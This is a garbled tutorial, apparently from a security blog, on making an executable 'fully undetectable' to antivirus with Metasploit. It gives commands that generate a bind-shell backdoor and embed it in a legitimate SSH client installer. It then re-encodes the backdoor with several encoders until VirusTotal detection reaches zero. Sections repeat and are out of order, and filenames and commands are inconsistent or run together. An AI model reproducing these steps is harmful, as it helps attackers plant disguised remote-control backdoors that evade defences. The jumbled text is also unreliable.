How To Bypass Antivirus Detection - Making An Executable FUD
So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.
A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!
Attention !!!
We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at RHA are not responsible for
Purpose:
Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.
Creating a Listener:
This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the test.exe file as shown below:
Analyzing the Listener with VirusTotal
Go to https://www.virustotal.com/en/
Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:
In the virustotal web page , Click the "scan it" button !!!
Encoding the Listener
You should see the evil-ssh.exe file as shown below :
If you see a "File already analyzed" message, click the "View last analysis" button.
Encode the Listener Again This process will encode the listener with several different encodings.
The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.
About The Author A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!
Attention !!!
We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at RHA are not responsible for
Purpose:
Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.
Creating a Listener:
This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the test.exe file as shown below:
Analyzing the Listener with VirusTotal
Go to https://www.virustotal.com/en/
Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:
In the virustotal web page , Click the "scan it" button !!!
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
this process will encode the listener, & insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil-ssh.exe file as shown below :
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.
Encode the Listener Again This process will encode the listener with several different encodings.
In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/test.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o
/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/test3.exe -t raw -o /root/test4.exe -e x86/call4_dword_xor -c 1
You should see several files as shown below :msfencode -i /root/test4.exe -o /root/test.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
Analyzing Again
The article is written by Malik Rafay, He is an independent security researcher and is the newest member on RHA team. You can contact him here.
Source
- http://samsclass.info/120/proj/p6x-AV-bypass.html